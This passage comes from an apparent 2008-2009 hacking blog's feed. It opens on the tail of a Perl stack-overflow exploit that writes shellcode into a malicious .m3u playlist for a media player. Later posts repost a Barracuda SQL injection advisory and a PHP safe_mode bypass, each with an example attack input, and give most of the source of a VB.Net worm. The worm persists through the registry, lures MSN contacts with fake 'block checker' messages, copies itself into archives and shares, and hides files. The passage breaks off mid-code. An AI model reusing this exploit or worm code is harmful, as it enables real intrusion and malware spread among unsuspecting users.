/&gt;"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32".&lt;br /&gt;"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d".&lt;br /&gt;"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x35\x4f\x4f\x48\x4d".&lt;br /&gt;"\x42\x45\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46".&lt;br /&gt;"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45".&lt;br /&gt;"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x56".&lt;br /&gt;"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x55\x49\x35\x49\x52\x4e\x4c".&lt;br /&gt;"\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x48\x44\x4e\x41\x33\x42\x4c".&lt;br /&gt;"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x54\x4e\x52".&lt;br /&gt;"\x43\x59\x4d\x58\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".&lt;br /&gt;"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f".&lt;br /&gt;"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x46".&lt;br /&gt;"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56".&lt;br /&gt;"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46".&lt;br /&gt;"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f".&lt;br /&gt;"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".&lt;br /&gt;"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d".&lt;br /&gt;"\x4f\x4f\x42\x4d\x5a";&lt;br /&gt;&lt;br /&gt;my $exploit = $buff.$ret.$nop.$shellcode;&lt;br /&gt;print "[+] Creating Evil File" ;&lt;br /&gt;open(blah, "&gt;&gt;$file") or die "Cannot open $file";&lt;br /&gt;print blah $exploit;&lt;br /&gt;close(blah);&lt;br /&gt;print "\n[+] Please wait while creating $file";&lt;br /&gt;print "\n[+] $file has been created";&lt;br /&gt;&lt;br /&gt;reference&lt;br /&gt;# &lt;a href="http://www.milw0rm.com/exploits/7853"&gt;milw0rm.com&lt;/a&gt; [2009-01-25]&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3629761739387648518?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3629761739387648518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3629761739387648518'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/01/elecard-mpeg-player-m3u-file-local.html' title='EleCard MPEG PLAYER (.m3u file) Local Stack Overflow Exploit'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2659218955611663381</id><published>2009-01-05T22:36:00.001+07:00</published><updated>2009-01-05T22:46:28.851+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><title type='text'>Kaspersky Anti-Virus 2009</title><content type='html'>Kaspersky Anti-Virus 2009 – the backbone of your PC’s security system, offering protection from a range of IT threats.&lt;br /&gt;&lt;br /&gt;Kaspersky Anti-Virus 2009 provides the basic tools needed to protect your PC.&lt;br /&gt;&lt;a href="http://www.ziddu.com/download/3105626/kav_2009_leaflet_v1_eng.rar.html" target="_blank"&gt;Download&lt;/a&gt; Kaspersky Anti-Virus 2009 brochure&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;a href="http://www.kaspersky.com/kaspersky_anti-virus" target="_blank"&gt;more detail&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2659218955611663381?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2659218955611663381'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2659218955611663381'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/01/kaspersky-anti-virus-2009.html' title='Kaspersky Anti-Virus 2009'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1773505218592050286</id><published>2008-12-25T15:35:00.002+07:00</published><updated>2008-12-25T15:49:42.811+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Proxy'/><title type='text'>Paros Proxy</title><content type='html'>A Java based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc. &lt;a href="http://www.ziddu.com/download/3011198/paros-3.2.13-win.zip.html" target="_blank"&gt;Download&lt;/a&gt; , Windows Installer&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;ref. &lt;a href="http://www.parosproxy.org/index.shtml" target="_blank"&gt;parosproxy&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1773505218592050286?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1773505218592050286'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1773505218592050286'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/12/paros-proxy.html' title='Paros Proxy'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-7390831201068561506</id><published>2008-12-25T15:24:00.002+07:00</published><updated>2008-12-25T15:31:14.430+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Denial of Service'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploit'/><title type='text'>SQL Injection Vulnerability</title><content type='html'>Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks. &lt;br /&gt;When exploited by an authenticated user, the identified vulnerability can lead to &lt;br /&gt;Denial of Service, Database Information Disclosure, etc.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;CVE Number: CVE-2008-1094&lt;br /&gt;Vulnerability: SQL Injection &lt;br /&gt;Risk: Medium&lt;br /&gt;Attack vector: From Remote&lt;br /&gt;&lt;br /&gt;Vulnerability Discovered: 16th June 2008&lt;br /&gt;Vendor Notified: 16th June 2008&lt;br /&gt;Advisory Released: 15th December 2008&lt;br /&gt;Description&lt;br /&gt;&lt;br /&gt;The index.cgi resource was identified as being susceptible to SQL Injection attacks. &lt;br /&gt;When filtering user accounts in Users-&gt;Account View section, the pattern_x parameter &lt;br /&gt;(where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set &lt;br /&gt;to search_count_equals‘ value.&lt;br /&gt;&lt;br /&gt;/cgi-bin/index.cgi?&amp;user=&amp;password=&amp;et=&amp;auth_type=Local&amp;locale=en_US&amp;realm=&amp;primary_tab=USERS&amp;secondary_tab=per_user_account_view&amp;boolean_0=boolean_and&amp;filter_0=search_count_equals&amp;pattern_0=if(database() like concat(char(99),char(37)),5,0)&lt;br /&gt;&lt;br /&gt;An attacker can exploit this vulnerability by injecting arbitrary SQL code to be &lt;br /&gt;executed as part of the SQL query.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Original Advisory:&lt;br /&gt;&lt;br /&gt;http://dcsl.ul.ie/advisories/02.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Barracuda Networks Technical Alert&lt;br /&gt;&lt;br /&gt;http://www.barracudanetworks.com/ns/support/tech_alert.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Affected Versions&lt;br /&gt;&lt;br /&gt;Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600)&lt;br /&gt;&lt;br /&gt;Other products/versions might be affected.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mitigation&lt;br /&gt;&lt;br /&gt;Vendor recommends to the following firmware version&lt;br /&gt;&lt;br /&gt;Barracuda Spam Firewall (Firmware v3.5.12.001)&lt;br /&gt;&lt;br /&gt;Alternatively, please contact Barracuda Networks for technical support.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Credits&lt;br /&gt;&lt;br /&gt;Dr. Marian Ventuneac, marian.ventuneac@ul.ie&lt;br /&gt;Data Communication Security Laboratory, Department of Electronic &amp; Computer Engineering, University of Limerick&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Disclaimer&lt;br /&gt;&lt;br /&gt;Data Communication Security Laboratory releases this information with the vendor acceptance. &lt;br /&gt;DCSL is not responsible for any malicious application of the information presented in this advisory. &lt;br /&gt;&lt;br /&gt;ref. &lt;a href="http://www.milw0rm.com/exploits/7496" target="_blank"&gt;milw0rm.com &lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-7390831201068561506?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/7390831201068561506'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/7390831201068561506'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/12/sql-injection-vulnerability.html' title='SQL Injection Vulnerability'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-12242603577525437</id><published>2008-12-10T01:39:00.002+07:00</published><updated>2008-12-10T01:41:31.645+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Download'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><title type='text'>PCMAV</title><content type='html'>Following PCMAV or Software Anti nation child masterpiece virus&lt;br /&gt;( Magazine PC Media) edition December 2008 or PCMAV version of 1.9.&lt;br /&gt;Virus-Virus which is on edition before all still,&lt;br /&gt;hopefully dgn this new edition can be dissipated. "&lt;br /&gt;there is no antivirus other capable to overcome with complete of&lt;br /&gt;computer virus, foreign and local good, which disseminating many in Indonesia as good as &lt;br /&gt;&lt;br /&gt;&lt;a href="http://soft-download-info.blogspot.com/2008/12/pcmav-19-desember.html"&gt;ref and download&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-12242603577525437?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/12242603577525437'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/12242603577525437'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/12/following-pcmav-or-software-anti-nation.html' title='PCMAV'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5063100498641291782</id><published>2008-12-10T01:30:00.003+07:00</published><updated>2008-12-10T01:42:11.960+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tube'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Deface'/><title type='text'>How To Hack or Deface Websites</title><content type='html'>How To Hack or Deface Websites (APP IN DESCRIPTION)!!&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/odO3tjJ_9cg&amp;hl=en&amp;fs=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/odO3tjJ_9cg&amp;hl=en&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=odO3tjJ_9cg"&gt;ref. &lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5063100498641291782?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5063100498641291782'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5063100498641291782'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/12/how-to-hack-or-deface-websites.html' title='How To Hack or Deface Websites'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-745913209818557288</id><published>2008-12-01T16:37:00.003+07:00</published><updated>2008-12-01T16:45:24.533+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PHP'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploit'/><title type='text'>PHP 5.2.6 (error_log) safe_mode Bypass Vulnerability</title><content type='html'>SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass&lt;br /&gt;Author: Maksymilian Arciemowicz (cXIb8O3)&lt;br /&gt;securityreason.com&lt;br /&gt;Date:&lt;br /&gt;- - Written: 10.11.2008&lt;br /&gt;- - Public: 20.11.2008&lt;br /&gt;&lt;br /&gt;SecurityReason Research&lt;br /&gt;SecurityAlert Id: 57&lt;br /&gt;&lt;br /&gt;CWE: CWE-264&lt;br /&gt;SecurityRisk: Medium&lt;br /&gt;&lt;br /&gt;Affected Software: PHP 5.2.6&lt;br /&gt;Advisory URL: http://securityreason.com/achievement_securityalert/57&lt;br /&gt;Vendor: http://www.php.net&lt;br /&gt;&lt;br /&gt;- --- 0.Description ---&lt;br /&gt;PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl &lt;br /&gt;with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web &lt;br /&gt;developers to write dynamically generated pages quickly.&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;error_log&lt;br /&gt;&lt;br /&gt;They allow you to define your own error handling rules, as well as modify the way the errors can &lt;br /&gt;be logged. This allows you to change and enhance error reporting to suit your needs.&lt;br /&gt;&lt;br /&gt;- --- 0. error_log const. bypassed by php_admin_flag ---&lt;br /&gt;The main problem is between using safe_mode in global mode&lt;br /&gt;&lt;br /&gt;php.ini­:&lt;br /&gt;safe_mode = On&lt;br /&gt;&lt;br /&gt;and declaring via php_admin_flag&lt;br /&gt;&lt;br /&gt;&lt;Directory "/www"&gt;&lt;br /&gt;...&lt;br /&gt; php_admin_flag safe_mode On&lt;br /&gt;&lt;/Directory&gt;&lt;br /&gt;&lt;br /&gt;When we create some php script in /www/ and try call to:&lt;br /&gt;&lt;br /&gt;ini_set("error_log", "/hack/");&lt;br /&gt;&lt;br /&gt;or in /www/.htaccess&lt;br /&gt;&lt;br /&gt;php_value error_log "/hack/bleh.php"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Result:&lt;br /&gt;&lt;br /&gt;Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0&lt;br /&gt;&lt;br /&gt;Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It was for safe_mode declared in php.ini. But if we use&lt;br /&gt;&lt;br /&gt;php_admin_flag safe_mode On &lt;br /&gt;&lt;br /&gt;in httpd.conf, we will get only&lt;br /&gt;&lt;br /&gt;Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4&lt;br /&gt;&lt;br /&gt;syntax in .htaccess&lt;br /&gt;&lt;br /&gt;php_value error_log "/hack/blehx.php"&lt;br /&gt;&lt;br /&gt;is allowed and bypass safe_mode.&lt;br /&gt;&lt;br /&gt;example exploit:&lt;br /&gt;error_log("&lt;?php phpinfo(); ?&gt;", 0);&lt;br /&gt;&lt;br /&gt;- --- 2. How to fix ---&lt;br /&gt;Fixed in CVS&lt;br /&gt;&lt;br /&gt;http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&amp;view=markup&lt;br /&gt;&lt;br /&gt;Note:&lt;br /&gt;Do not use safe_mode as a main safety.&lt;br /&gt;&lt;br /&gt; --- 3. Greets ---&lt;br /&gt;sp3x Infospec schain p_e_a pi3&lt;br /&gt;&lt;br /&gt;- --- 4. Contact ---&lt;br /&gt;Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]&lt;br /&gt;Email: cxib [at] securityreason [dot] com&lt;br /&gt;GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg&lt;br /&gt;http://securityreason.com&lt;br /&gt;http://securityreason.pl&lt;br /&gt;&lt;br /&gt;# &lt;a href="http://milw0rm.com"&gt;milw0rm.com&lt;/a&gt; [2008-11-20]&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-745913209818557288?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/745913209818557288'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/745913209818557288'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/12/php-526-errorlog-safemode-bypass.html' title='PHP 5.2.6 (error_log) safe_mode Bypass Vulnerability'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-8600197386310743856</id><published>2008-11-30T23:51:00.002+07:00</published><updated>2008-12-10T01:41:54.602+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tube'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Hacking Friendster</title><content type='html'>&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/x0eGn84YqBA&amp;hl=en&amp;fs=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/x0eGn84YqBA&amp;hl=en&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Watching, friendster hack tube&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-8600197386310743856?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/8600197386310743856'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/8600197386310743856'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2008/11/hacking-friendster.html' title='Hacking Friendster'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-8978638966007772652</id><published>2008-10-27T04:02:00.003+07:00</published><updated>2008-10-27T04:06:42.272+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VB'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus'/><title type='text'>VB .Net Worm</title><content type='html'>A basic MSN Messanger &amp; ZIP/RAR Archive &amp; MSN shares worm.. Don't try to spread it!&lt;br /&gt;Written in VB.Net due to synge complaining that there isnt enough VB.Net malware lol&lt;br /&gt;&lt;br /&gt;source code:&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Imports MessengerAPI&lt;br /&gt;Imports System.Diagnostics&lt;br /&gt;Imports System.Reflection&lt;br /&gt;Imports Microsoft.Win32&lt;br /&gt;Imports System.IO&lt;br /&gt;Imports System.Net&lt;br /&gt;Imports System.Text&lt;br /&gt;&lt;br /&gt;'A basic MSN Messanger &amp; ZIP/RAR Archive &amp; MSN shares worm.. Don't try to spread it!&lt;br /&gt;'Written in VB.Net due to synge complaining that there isnt enough VB.Net malware lol&lt;br /&gt;&lt;br /&gt;'''''''''''''''''''''''''''''''''&lt;br /&gt;'     Genetix {Doomriderz}      '&lt;br /&gt;'       W32/Nurofen.worm        '&lt;br /&gt;'           XMAS 2006           '&lt;br /&gt;'''''''''''''''''''''''''''''''''&lt;br /&gt;&lt;br /&gt;'1: adds to registry run key to start with windows "c:\MSNUpdate.exe".&lt;br /&gt;'2: waits for msn to load by checking processes for "msnmsgr" then waits and checks to see if it's signed in and appear as online.&lt;br /&gt;'3: uploads a copy of itself to the filesever with a random file name&lt;br /&gt;'4: get's a random topic &amp; gets all online contacts&lt;br /&gt;'5: sends the random topic with the url to the worm download &amp; url to DotNet framework 2.0 :p&lt;br /&gt;'6: checks if the WinRar.exe exists by checking for the path in the registry&lt;br /&gt;'7: searches for rar &amp; zip files in it's folder and drops a copy of itself inside them&lt;br /&gt;'8: Find MSN shared folders and copy as "Game.exe" to them.&lt;br /&gt;'9: Kinda harmless payload that hides every file on the drive (attr +H)&lt;br /&gt;&lt;br /&gt;'My worm will work depending on the follwoing reasons:&lt;br /&gt;'1: The file server used dont change how it handles uploads&lt;br /&gt;'2: You dont change the code and mess it all up!&lt;br /&gt;'3: you have .net 2.0&lt;br /&gt;'4: you have internet access&lt;br /&gt;'4: its bug free (i think it is but report any bugs to me genetix [AT] phreaker [Dot] net&lt;br /&gt;'5: If it dont work for people trying to spread it then I dont care! I hope it fails on you.&lt;br /&gt;Public Class Form1&lt;br /&gt;    Private Const MAX_PATH As Integer = 260&lt;br /&gt;&lt;br /&gt;    'declare some API's / variables... ect that will be used globaly in this worm&lt;br /&gt;    Private Declare Auto Function GetShortPathName Lib "kernel32" ( _&lt;br /&gt;    ByVal lpszLongPath As String, _&lt;br /&gt;    ByVal lpszShortPath As System.Text.StringBuilder, _&lt;br /&gt;    ByVal cchBuffer As Integer) As Integer&lt;br /&gt;    Const DotNet As String = "http://MSDOTNET.notlong.com" 'short url to .net 2.0&lt;br /&gt;    Dim RarPath As String&lt;br /&gt;    Dim WormPath As String&lt;br /&gt;    Dim WormFile As String&lt;br /&gt;    Dim msn As New Messenger()&lt;br /&gt;    Dim Victims As IMessengerContacts&lt;br /&gt;    Dim Victim As IMessengerContact&lt;br /&gt;    Dim Worm As String&lt;br /&gt;    Dim url As String&lt;br /&gt;    Const KeyTitle As String = "MSNUpdate"&lt;br /&gt;    Const subkey As String = "Software\Microsoft\Windows\CurrentVersion\Run"&lt;br /&gt;&lt;br /&gt;    'This sub deals with calling other needed sub's/functions and is the main body &lt;br /&gt;    'of the contacts spreading.&lt;br /&gt;    Sub MSN_Worm()&lt;br /&gt;        On Error Resume Next&lt;br /&gt;        upload()&lt;br /&gt;        File.Delete(Worm)&lt;br /&gt;        Dim message(15) As String&lt;br /&gt;        Randomize()&lt;br /&gt;        ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        'some lame messages to fool the user into getting this worm..  '&lt;br /&gt;        ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        message(1) = "New msn block checker 1.5 Download here: " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(2) = "MSN Block checker download " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(3) = "Working MSN block checker " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(4) = "Free MSN Add-ons limited! " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(5) = "New MSN messanger 2007 " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(6) = "Find out who's blocked you! " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(7) = "Download the new MSN block checker! " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(8) = "Download the new MSN smilie kit! " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(9) = "NEW MSN BLOCK CHECKER DOWNLOAD NOW! " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(10) = "Download the new MSN bot it talks like a real person!! " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(11) = "New MSN tool get it now! " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(12) = "Download our new MSN block checker " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(13) = "Find out who is blocking you on MSN " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(14) = "This program can get your friends MSN passwords!! " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;        message(15) = "Find out your friends MSN passwords! " &amp; url &amp; _&lt;br /&gt;        " you will need to install the .net framework to run this application, here: " &amp; DotNet&lt;br /&gt;&lt;br /&gt;        ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        'okay so now it searches for online contacts and and opens a       '&lt;br /&gt;        'a chat window to send its download link then closes the window..  ' &lt;br /&gt;        'all done kinda reall fast                                         '&lt;br /&gt;        ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;        Victims = msn.MyContacts&lt;br /&gt;        For Each Victim In Victims&lt;br /&gt;            If Victim.Status &lt;&gt; MISTATUS.MISTATUS_OFFLINE Then&lt;br /&gt;                If Victim.Blocked &lt;&gt; True Then&lt;br /&gt;                    msn.InstantMessage(Victim.SigninName)&lt;br /&gt;                    SendKeys.SendWait(message(Int(15 * Rnd()) + 1))&lt;br /&gt;                    SendKeys.SendWait("{ENTER}")&lt;br /&gt;                    SendKeys.SendWait("{ESC}")&lt;br /&gt;                End If&lt;br /&gt;            End If&lt;br 